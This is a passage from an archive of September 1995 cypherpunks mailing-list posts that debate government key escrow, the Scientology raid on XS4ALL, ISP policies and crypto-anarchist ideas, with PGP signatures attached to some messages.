iQCVAwUBME7WOLCsmOInW9opAQHbawP+PSC+9p7ll7yKTiwnkzrIf+aT/ZfuoCqj
Fp6ZhykIoJQVF5YAEhz9O1t9FKOauo3baMDhaIvU4pUSm2b/hKlUFB8cwYr7KTjd
MFGxTOG/D7blGuX6ZXbHlS5EkKeT1pDtfrd9GlnTKWHxfga/51ROWCG/33BWZxHR
lyNLI07UPbo=
=kFkC
-----END PGP SIGNATURE-----

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 7 Sep 95 07:36:21 PDT
To: cypherpunks@toad.com
Subject: Re: Growth of actions definded as crime. Which math formula?
Message-ID: <199509071435.HAA04352@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:29 PM 9/6/95 -0700, Timothy C. May wrote:
> I've seen figures on the "linear feet" of regulations, and how they are
> growing exponentially, but I don't recall the numbers. Something like the
> total number of laws doubling every 10 years or so, but don't quote me on
> this one.

In addition one should also consider that most of these new crimes
are deliberately written to be sweeping and vague so that they can
be enforced in a selective and capricious manner:  For example
wetlands are deliberately defined in a way to give them considerable
elbow room, indeed so much elbow room that much of death valley
technically qualifies as wetlands.  The wetlands law was written 
to make it easy for bureaucrats to win lawsuits, not to reflect 
common sense or basic sanity.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 7 Sep 95 08:09:54 PDT
To: an116512@anon.penet.fi
Subject: Re: not a flame please read and think about this
In-Reply-To: <9509070626.AA07408@anon.penet.fi>
Message-ID: <Pine.SUN.3.91.950907074029.24168A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 7 Sep 1995 an116512@anon.penet.fi wrote:

> why is it that half the
> people who post here work for the government or big companies that are doing
> governments bidding (rand.org (which is part of the the nsa!) att.com (makers of the clipper chip)
> mit (which onwns rsa)
> netscape etc etc)

I doubt the statistics and I don't see how mere employment with
the above somehow disqualifies one for having a regard for 
privacy.  In many cases, they have a much better grasp of the
threat than the rest of us.

> what makes me wonder isnt so much that theyre here but that they post socalled
> reasonable stuff that supports the  the government line.

This is nonsense.  Please give some examples of the sycophantic
posts you claim supports "the government line."

> like when these people report on
> what the nsa guy says at the crypto convention as if were supposed to take it
> seriously and these people who say clipper is good enough no back doors.
> and then everyone takes this crap seriously.

Who?  When?  To which "everyone" do you refer?

> . . . arent we supposed to be
> cypherPUNKS?

What the hell is that supposed to mean?  The name was given and
accepted in jest.  I'm not aware of any special PUNK 
qualifications.  Please elucidate.

> than why do we need these people to think for us?

The Cypherpunks I know certainly don't; sorry to hear about you.

Are you planning to show up at Saturday's anniversary meeting
again, Larry?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 7 Sep 95 08:11:36 PDT
To: mark@lochard.com.au
Subject: Re: Scientology and police visit XS4ALL Amsterdam
Message-ID: <9509071507.AA08037@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> My personal view is co$ deserves all the flak they get.

I know who you're referring to by saying co$, but what do co$ mean?
Co-DollarSign?  Co-Dollar?

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 7 Sep 95 08:22:03 PDT
To: Duncan Frissell <terrell@sam.neosoft.com>
Subject: Re: cryptography eliminates lawyers?
Message-ID: <199509071521.IAA07990@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:05 AM 9/7/95 -0400, Duncan Frissell wrote:
> Well, if crypto reduces the role of government in human affairs, it will 
> reduce work for lawyers.  Telecoms will certainly break the professional 
> monopoly of lawyers (and other professionals).

The functional equivalent of lawyers will still have a role.  When
an escrow agent allocates large chunks of money in some fashion,
and somebody says X was bad, and X says that Y was bad, and the
reputations are worth real money, we will need a public 
examination to determine what really happened.

And if governments collapse entirely, and we get full bore anarchy,
lawyers will have even more work because instead of a few reputations
being worth large sums of cash, everyones reputation will be worth 
life and limb.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Thu, 7 Sep 95 05:58:29 PDT
To: Deranged Mutant <rrothenb@ic.sunysb.edu>
Subject: Re: ECPA (Was: University logging mail to anon.penet.fi)
In-Reply-To: <199509070542.BAA23214@libws4.ic.sunysb.edu>
Message-ID: <IAA25764.199509071255@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <199509070542.BAA23214@libws4.ic.sunysb.edu>, Deranged Mutant writes
[...]
>I've heard some nasty stories about boards and a couple of I-Net providers
>who charge for access but reserve the right to throw someone off the system
>without refund (it's often in the terms of many account applications) for
>various no-nos.

Alot do more or less that, but if you were an Internet Service
Provider how would you deal with it?  For example what if a customer
started sending obscene material to people who didn't want it, and
the recipents started to complain to you, or the goverment?

If you (the ISP) don't have a service agreement that says you can
disconnect the customer in that case you are in danger of getting
sued by them if you cut them off.  If you don't cut them off you
are in danger of getting sued or shut down by the goverment.

Even if we were in a more libertarian society you run the risk of
being boycotted by potential customers (of corse the analagy breaks
down somewhat, in a very libertarian society oyu might be able to
run a profatable ISP selling to the very nich market of people who
want to threten, harass, or generally make a nuicence of themselves).

As a result are unlikely to find an ISP that doesn't have a set of no-no's.
(and if you do they may not be in bisness for long)  The best I think
you can do is find an ISP that publishes their list of no-no's (like
the one I work for UUNET - see any file in ftp://ftp.uu.net/uunet-info
with "svc" in it's name and skip down to "AlterNet Terms and Conditions"),
and seems to have a reasonable set of them, and last but not least make
sure that they do at least refund any payment for service not recieved.

For example UUNET (which I work for - but this is mostly irrelivant as
this is a statment of the facts, not an oponion) publishes their
terms and conditions in ftp://ftp.uu.net/uunet-info (look at any file
with "svc" in it's name and skip down to "AlterNet Terms and Conditions").
As for reasonability I'll leave that up to you to decide.
-- 
And no, I'm not speaking for UUNET Technologies, or anyone but myself.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Thu, 7 Sep 95 06:16:30 PDT
To: hallam@w3.org
Subject: Re: Are booby-trapped computers legal?
In-Reply-To: <9509061938.AA02249@zorch.w3.org>
Message-ID: <JAA25827.199509071316@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <9509061938.AA02249@zorch.w3.org>, hallam@w3.org writes:
[...]
>People who go round drawing parallels to gun ownership and cryptography 
>ownership are simply playing into the governments hands.

That could well be.  (that's a crypto relivant as this message
gets - sorry)

>                                                        Cryptography has net 
>benefits to society. Most advocates of gun ownership tend to convince me of 
>little more than they are a danger to society. Regardless of their case they a
>re 
>the biggest argument for gun control, and therfore poor advocates of their 
>cause.    [...]

I'm sorry to see you say that, but rather then argue here I'll provide
a pointer to a fine set of arguments "A Nation of Cowards" by Jeffrey R. 
Snyder (the "nation" it refers to is the USA, not the UK).  Available
via the web <http://www.cs.cmu.edu/~karl/firearms/cowards.html>, enjoy
or not.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Roth-Biester <derek@hagling.demon.co.uk> (by way of Duncan Frissell <frissell@panix.com>)
Date: Thu, 7 Sep 95 06:52:32 PDT
To: cypherpunks@toad.com
Subject: Cybersecurity
Message-ID: <199509071329.JAA06512@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


> >>	"Cybersecurity" - an investigation into cryptography, the
> >>	Internet, civil rights, Phil Zimmermann, PGP (and should we be
> >>	permitted to use it?) and so forth.
> >>

[My wife] and I watched this program - she found it very informative -
otherwise for
me it wasn't anything new, other than to see Whitfield Diffie, Phil Zimmermann
and some porn star Cyberella being interviewed about public/private key 
encryption.  It was very much on the side of those seeking privacy, presenting
the government (even in the UK they are looking at mandatory key escrow, but
they haven't exactly told British subjects about it) as being underhand,
sneaking around to find ways of removing the privacy of the individual.  What 
they didn't say is that the debate is a moot point.  The technology is out there
and there ain't nothin' the guvmint can do about it.

Derek








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Wed, 6 Sep 95 20:49:19 PDT
To: cg@bofh.lake.de
Subject: Re: Scientology and police visit XS4ALL Amsterdam
In-Reply-To: <m0sqR1Y-000Pa2C@bofh.lake.de>
Message-ID: <199509062303.AA24688@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>>      This is the second or third time I've seen descriptions of such
>>      raids where cult (no, I'm not trying to be diplomatic)
>>      representatives were present and participating.  Is this legal in
>>      Amsterdam?  How about in the U.S.?  Britain?
>> 
>Probably. Amsterdam isn't exactly the wild west, and they didn't take the
>computer equipment with them, they just inventoried everything so to have
>something to sell when their claims prove valid. Which I doubt (shit, I
>will be moving to this country in a couple of weeks...)

The good news is xs4all were prepared for them and have mounted a publicity
campaign against co$. co$ has withdrawn their complaint (though xs4all have
not be _officially notified yet) in an attempt to patch up things but it's
too late for co$ to save them from the wrath.

xs4all has a lot of support in all facets of .nl life so co$ is going to have
a bad time screwing with them. From what I learnt there will be a lot of noise
RSN in the press.

My personal view is co$ deserves all the flak they get.

Mark
mark@lochard.com.au
The above opinions are rumoured to be mine.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 7 Sep 95 10:10:01 PDT
To: Brian Davis <bdavis@thepoint.net>
Subject: Why Key Escrow (GAK) is So Bad
Message-ID: <ac746ec024021004a78f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:25 AM 9/4/95, Brian Davis wrote:
>On Fri, 1 Sep 1995, Timothy C. May wrote:

>> I absolutely agree with this, though this doesn't mean I'll stop worrying
>> about the government's plans for key escrow (GAK), about limits on key
>> lengths, or about other efforts to thwart strong security.
>
>I, of course, know of the "dislike" of GAK here.  I am curious to know,
>however, if the "dislike" is because government would have access under
>any circumstances or if the primary worry is that government will cheat
>and get access when most would agree that they shouldn't (either by the
>judge "cheating" or a TLA stealing it).
>
>In other words ... if it took agreement by a review board composed of
>non-LEA members of this list, would the escrow be acceptable??


[I'm addressing the basic issue of key escrow, or what Carl Ellison calls
"GAK" (Government Access to Keys), not the current debate in D.C. about
using some form of key escrow for exportable crypto. The debate on key
escrow is really about the crypto citizens will use, not what will be
allowed to be exported.]

Speaking for myself--though I think this captures the feelings of many--my
objection to GAK is on *principle*:

* No government can tell me what language I must communicate in and what
language I must _not_ communicate in.

David Sternlight has characterized this position as "childish," as the
whinings of spoiled children who don't want to be told what to do. If so,
then Thomas Jefferson was surely the biggest child of all, as he and his
compatriots developed and used secret codes for communications. No doubt
King George would have found GAK quite useful.

No, the point is really about whether people may speak and write in the
languages they wish, or be ordered to speak and write in ways the
government can monitor, with or without the "speed bump" of  key escrow and
court orders to release the escrowed keys.

(Ironically, I just heard about a case in Texas where a judge ordered a
mother to stop speaking in Spanish to her child at home, calling it "child
abuse." The implications of this are self-evident.)

"Escrow" of communications keys, when commanded by the government, is no
different than requiring that all locks have duplicate keys "escrowed" with
the police, or that all curtains and window shades have a special
"invisibility mode" that "law enforcement" can enable under certain
circumstances.

"Key escrow," or GAK, is to most of us equivalent to universal wiretapping.
Why not tape-record all calls and "escrow" the result?. Why not mount
surveillance cameras in homes and "escrow" the result? All are essentially
equivalent.

The pernicious nature of the "escrow" idea, which I have to admit is a new
twist on the surveillance state that was not anticipated by Orwell,
Brunner, or any of the other writers on this topic, is that it says that
surveillance is not so bad after all, because the results of the escrow
will not be looked at except when "justified." By whom? And by what
conceivable right can the government tell me I may not use the
communication system and language of my choice?

I have no doubt that such key escrow, or recording of all calls, or
surveillance cameras, with escrowed results, would "stop" some crimes.
Maybe even some serious crimes, even horrific crimes.

So what? In a free society, we don't tell people what language they may
speak in, and with whom, nor did we place microphones and cameras in their
presence, even if we "escrow" the results and promise not to look unless a
judge or a review panel says it's OK. There are undoubtedly crimes that
would be stopped if surveillance cameras were placed in many places,
private and public, with "video escrow."

Friends of mine are developing micropower, tiny, ultrawideband radio
"localizers," that could be used by parents to keep track of children,
pets, luggage, etc. I have long joked with them about "position escrow,"
where the government will mandate that all citizen-units wear these devices
(or have them implanted) so that their positions can be monitored. Would an
"escrow" system make it any less unacceptable? The arguments for "position
escrow," once the technology becomes available (surely by 1998-9) are very
similar to those being made for communications escrow. Lots of crimes would
be solved, and even OJ might be convicted, if a court could order the
"position escrow" files opened. So what? That's now what a free society is
about.

The basic principle is the issue.

There are other problems with key escrow, involving such things as how
persistent the access keys will be (will a court order reveal past
communications not covered by the order?), who will have access, etc. These
are the things the government _wants_ us to focus on, as these can probably
be fixed by sufficiently elaborate protocols...sort of.

But the core issue is not being addressed, the core issue of surveillance
and the government's plan to order us to speak only in certain approved
modes.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: H Keith Henson <hkhenson@shell.portal.com>
Date: Thu, 7 Sep 95 10:25:07 PDT
To: cypherpunks@toad.com
Subject: PGP key disclosure
Message-ID: <199509071723.KAA02608@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain



[included msg]

i've been told that larry wollersheim refuses to give up his 
de-encryption key to Co$, and will go to jail before he does.

this is ok to post. i can't post yet, due to technology transfer 
happening here at the usf.edu

--------------------------------------m. council, human being
Hell, if you understood
everything I say, you'd              council@luna.cas.usf.edu
be me.     -Miles Davis

[end included msg]

I am off cypherpunks at the moment, so if there are any followups
to this, please send me email.  Thanks, Keith Henson




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@cory.EECS.Berkeley.EDU>
Date: Thu, 7 Sep 95 10:24:15 PDT
To: cypherpunks@toad.com
Subject: How to get to Saturday's meeting in SF?
Message-ID: <199509071724.KAA00396@cory.EECS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I'd like to go to the meeting on Saturday in SF, but I need instructions
on how to get there by public transit from the Berkeley campus.
(Alternatively, is anyone going that may be able to give me a lift?)

Thanks,

   - Ian



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 7 Sep 95 10:22:39 PDT
To: cypherpunks@toad.com
Subject: Crypto Anarchy and Virtual Communities
Message-ID: <ac7478e02602100408bb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:15 PM 9/7/95, Duncan Frissell wrote:
>At 09:20 PM 9/6/95 -0500, Mac Norton wrote:
>>Well, scratch me deeply enough, I'm not sure I'd disagree
>>with Tim, "philosophically speaking."  The problem is, as
>>all the truly wise philosophers recognized, we must live
>>in the world.  And given the number of us who must do so,
>>that entails rules.
>
>That's what so nice about the nets.  You don't (won't) have to "live in the
>world" any more.  The creation of consentual halucinations (virtual worlds)
>allows you to "change the world" at will.
>
>And once the interface improves...
>
>Actually, the creation of separate "spaces" that can only be entered with
>your (each person's) permission will have a big impact on life in the real
>world.

I of course agree strongly with Duncan.

We don't often talk about this aspect, as it was all hashed-over a couple
of years ago, and most newcomers to the list do not seem as interested as
we were. (And, it has little to do with coding in C  :-})

Those interested might want to look at the very long chapter on "Crypto
Anarchy" in my Cyphernomicon, or my paper, "Crypto Anarchy and Virtual
Communities."

Or read "True Names" and "Snow Crash" and think about what happens when the
stuff we talk about is added. (Hint: Hiro Protagonist would not be "vastly
wealthy" in the Metaverse but poor in the Real World (tm).)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Saitmacher, Klaus, Dr., DyStar"      <Saitmacher@MSMDSTTF.frankfurt.hoechst-ag.d400.de>
Date: Thu, 7 Sep 95 01:26:57 PDT
To: Cypher <cypherpunks@toad.com> (Receipt Notification Requested) (Non Receipt    Notification Requested)
Subject: subscripe
Message-ID: <000C8D27.MAI*/S=Saitmacher/OU=MSMDSTTF/O=FRANKFURT/PRMD=hoechst-ag/ADMD=dbp/C=de/@MHS>
MIME-Version: 1.0
Content-Type: text/plain



subscripe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Thu, 7 Sep 95 09:49:06 PDT
To: Patrick Horgan <patrick@Verity.COM>
Subject: Re: Scientology and police visit XS4ALL Amsterdam
In-Reply-To: <9509071507.AA08037@cantina.verity.com>
Message-ID: <Pine.LNX.3.91.950907104256.5239H-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 7 Sep 1995, Patrick Horgan wrote: 

> Date: Thu, 7 Sep 1995 08:07:39 -0700
> From: Patrick Horgan <patrick@Verity.COM>
> To: cg@bofh.lake.de, mark@lochard.com.au
> Cc: cypherpunks@toad.com
> Subject: Re: Scientology and police visit XS4ALL Amsterdam
> 
> > My personal view is co$ deserves all the flak they get.
> 
> I know who you're referring to by saying co$, but what do co$ mean?
> Co-DollarSign?  Co-Dollar?
> 

CO$ is _C_hurch _O_f _$_cientology

L. Ronboy the telepath Hubbards biggest joke.

- -pjf



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBME8hqE3Qo/lG0AH5AQGFkAQAikXaF7nCJ99+XBONXKcvBTO7lMZn+wEZ
l9+YZOI6QLZNY/f/HB5mOorwn340lgED0y/RjoT9ctoXwVW9bNSZZ68lQm7k72wO
Ymz1NxHfwQRq8FNiUZnKmz+Wb/YHpAwGhvvPfocA+rLupdd9x/9BSm047RDgwgvX
MVEx4B5C8wI=
=ot1t
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Thu, 7 Sep 95 07:46:24 PDT
To: cypherpunks@toad.com
Subject: Cryptography Technical Report Server (CTRS) needs submissions!
Message-ID: <199509071442.KAA03274@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


Earlier this week I posted a note bemoaning the lack of a good
searchable repository for cryptography related technical reports.
In short, I volunteered to develop, host and maintain such a system
as a service to the rest of the Internet.  The system is ready, now
the fun part begins...

The Cryptographic Technical Report Service needs *YOU*. Specifically,
it needs your technical reports (or other technical documentation).
In order for CTRS to become popular, it needs to have a useful amount
of data to search, so I'm currently soliciting submissions for the
database.

Contributing to CTRS is pretty simple.  Detailed information can be
found at <http://porthos.itribe.net/CTRS/FAQ.html#contribute>, but
basically all that's required is to send <ctrs-submissions@itribe.net>
a refer-format bibliographic entry which contains a URL pointing to
the paper's real Net location.  I'll index the entries (prettyprinting
them, of course), and CTRS users will follow that URL if they want to
retrieve the paper.  If you don't have a URL, I'm willing to host as
many papers as I have resources for.  Full details can be found at the
URL above, but please note that I'm only able to accept papers
submitted by the authors (or copyright holder).

If you'd like to know more about CTRS, you can check out it's beta
version at <http://www.itribe.net/CTRS/>
(<https://www.itribe.net/CTRS/> for the SSL version).  The database
doesn't have much (anything) in it right now, so I'm relying totally on
submissions in order to build the collection.

I firmly believe that CTRS can provide a useful service to the
cryptographic community, so I hope you will all consider contributing
your reports to CTRS.  If you have questions, please check out the
CTRS FAQ <http://www.itribe.net/CTRS/FAQ.html>.  If you still have
questions, feel free to contact me at the email address below.

==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			|
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 7 Sep 95 10:34:48 PDT
To: cypherpunks@toad.com
Subject: Why Key Escrow (GAK) is So Bad
Message-ID: <ac747c2227021004cc7a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


I wrote:

....
made for communications escrow. Lots of crimes would be solved, and even OJ
might be convicted, if a court could order the "position escrow" files
opened. So what? That's now what a free society is about.
....

This last line has a typo. What I meant to say was:

"That's not what a free society is about."

Normally I don't post minor corrections, but this one needs correcting.

--Tim


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 7 Sep 95 08:34:01 PDT
To: cypherpunks@toad.com
Subject: Force Ratios
Message-ID: <199509071447.KAA28579@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Wednesday night's ABC magazine program on Ruby Ridge was a great example of
what TV can be but so rarely is.  Lots of chopper shots of Ruby Ridge.  Lots
of hand held camera recreations and interviews with the Weavers and the
sniper (face obscured because he has something to hide), etc.

But the most interesting thing that this emphasized for me was the sort of
modern information warfare issues as highlighted in the recent Economist
Survey.  Info war is war by other means (a little shooting, communications,
publicity, and litigation) and look what happened at Ruby Ridge.  The Feds
deployed 400 "troopies", some armored personnel carriers, copters, executive
jets, Hummers, and other hardware.  On the other side were 3 adults and 4
children with some 14 personal weapons.

The result.  One Fed and two Weavers dead.  A $3.1 million legal settlement,
and continuing problems for the Feds.  That smells like a bad defeat to me.
They couldn't even kill 7 people with a 57 to 1 force ratio.  

In addition, the operation and the various investigations must have cost the
Feds millions more.  (What *do* the Fibbies have to pay for those Ninja
Hoods?)  And they lost.

That suggests that the ability of The Great Enemy to overcome the sort of
directed human activity of the frictionless markets we are building will be
quite limited.

DCF

"Your Honor, the Defense will rest without calling any witnesses.  No
witnesses we could put on the stand could do as good a job setting forth the
Defense case as the Government's witnesses have already done." -- Gerry
Spence at the conclusion of the Government's case in US vs. Weaver.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjm@ionia.engr.sgi.com (Patrick May)
Date: Thu, 7 Sep 95 11:05:58 PDT
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: GAK
In-Reply-To: <ac6cea0f00021004158f@[205.199.118.202]>
Message-ID: <199509071805.LAA12656@ionia.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


Brian Davis writes:
 > I, of course, know of the "dislike" of GAK here.  I am curious to know, 
 > however, if the "dislike" is because government would have access under 
 > any circumstances or if the primary worry is that government will cheat 
 > and get access when most would agree that they shouldn't (either by the 
 > judge "cheating" or a TLA stealing it).

     Since you're sure to get a number of long responses to this
question, I'll keep mine short.

     I don't want to give anyone my keys.  I do not harm anyone by
refusing to do so.  Therefore, anyone using force to take my keys is
acting immorally.*

 > In other words ... if it took agreement by a review board composed of 
 > non-LEA members of this list, would the escrow be acceptable??

     No.  I don't choose to give Louis Freeh my keys.  I don't choose
to give Brian Davis my keys.  I don't choose to give Tim May my keys.
Any use of force to compel me to yield my keys is unacceptable.

Regards,

Patrick May

* Insert standard Objectivist and Libertarian arguments regarding
  morality, government, and force here.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjm@ionia.engr.sgi.com (Patrick May)
Date: Thu, 7 Sep 95 11:05:49 PDT
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: GAK
In-Reply-To: <ac6cea0f00021004158f@[205.199.118.202]>
Message-ID: <199509071805.LAA12805@ionia.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Brian Davis writes:
 > I, of course, know of the "dislike" of GAK here.  I am curious to know, 
 > however, if the "dislike" is because government would have access under 
 > any circumstances or if the primary worry is that government will cheat 
 > and get access when most would agree that they shouldn't (either by the 
 > judge "cheating" or a TLA stealing it).

     Since you're sure to get a number of long responses to this
question, I'll keep mine short.

     I don't want to give anyone my keys.  I do not harm anyone by
refusing to do so.  Therefore, anyone using force to take my keys is
acting immorally.*

 > In other words ... if it took agreement by a review board composed of 
 > non-LEA members of this list, would the escrow be acceptable??

     No.  I don't choose to give Louis Freeh my keys.  I don't choose
to give Brian Davis my keys.  I don't choose to give Tim May my keys.
Any use of force to compel me to yield my keys is unacceptable.

Regards,

Patrick May

* Insert standard Objectivist and Libertarian arguments regarding
  morality, government, and force here.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBME80YO5Yg08fDKehAQEoqAP/QWcvU4xu4qQNw7S6RNPQ+zCmGzh+B/7r
G/490EMOKifsraaDYmh0WRBJ7+2rr+sWuvwpnJzVhRPcR1Mhzz/ZbNjrIm5wFhDH
/Yrkln3oZ8iIKgvvwrw75krBG511CHvHg0OudYsxuuP10pgQaT59uQF0bod1plY0
zpao6in3ZKI=
=QxbQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 7 Sep 95 10:55:19 PDT
To: cypherpunks@toad.com
Subject: GAK Hacks
Message-ID: <ac747fdf2a021004ad80@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:43 PM 9/7/95, Matthew Ghio wrote:

>The same applies to GAK.  There is no reason to hack it when you can just
>use PGP instead.  The only reason to hack it would be if it became a
>standard.  If we have to start hacking GAK applications, we've already
>lost to a degree.  Thus our focus should be on making alternatives
>available instead of just attacking GAK.  (Although I suppose you could
>show how to hack it, for the sake of making a political statement.)

GAK Hacks!

We did it for SSL, let's do it for GAK.

Demonstrate that superencryption (encrypting within a GAK wrapper) defeats
GAK. And other kinds of hacks, including releasing "damaged" (inoperative)
versions of the proposed code (when it becomes available).

Or releasing "work-alikes." Etc.

Granted, the demonstrations will be less clear than breaking the 40-bit key
was, partly because there is no clear-cut standard out there, and many
aspects of GAK are still in flux.

But it could still be a powerful example, an example "by direct
demonstration," that government-mandated key escrow is problematic.

(Of course, a sufficiently powerful or clear demonstration, picked up by
the popular press the way the SSL challenge was, could also cause the
government to tighten up the rules on GAK, such
as--speculatively!!!!--adding "compliance audits" to the GAK laws.)

But GAK Hacking could be an interesting project.

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Thu, 7 Sep 95 08:23:13 PDT
To: cypherpunks@toad.com
Subject: Re: Notes from NIS&T Key Escrow Export conference.
Message-ID: <9509071523.AA12261@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>The last issue in the session was that the length of the key, 64-bits,
>was defined in criteria #1. There was no discussion at the conference on
>this criteria. It seems that the NIS&T and NSA folks believe that this is a
>closed topic. The folks in the session did not agree. They felt that 64-bits
>was not enough.

I hope this gets to you before the conference is over. I would REALLY
like to hear the government response to the question:

"If keys are escrowed, what purpose does a 64 bit limit serve?"

Secondarily, I observe that this apparently precludes the use of OTP.

Peter Trei
ptrei@acm.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 7 Sep 95 08:39:14 PDT
To: cypherpunks@toad.com
Subject: Re: ECPA (Was: University logging mail to anon.penet.fi)
Message-ID: <199509071535.LAA49458@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"Josh M. Osborne" <stripes@va.pubnix.com> writes:

<snip>

>Even if we were in a more libertarian society you run the risk of
>being boycotted by potential customers (of corse the analagy breaks
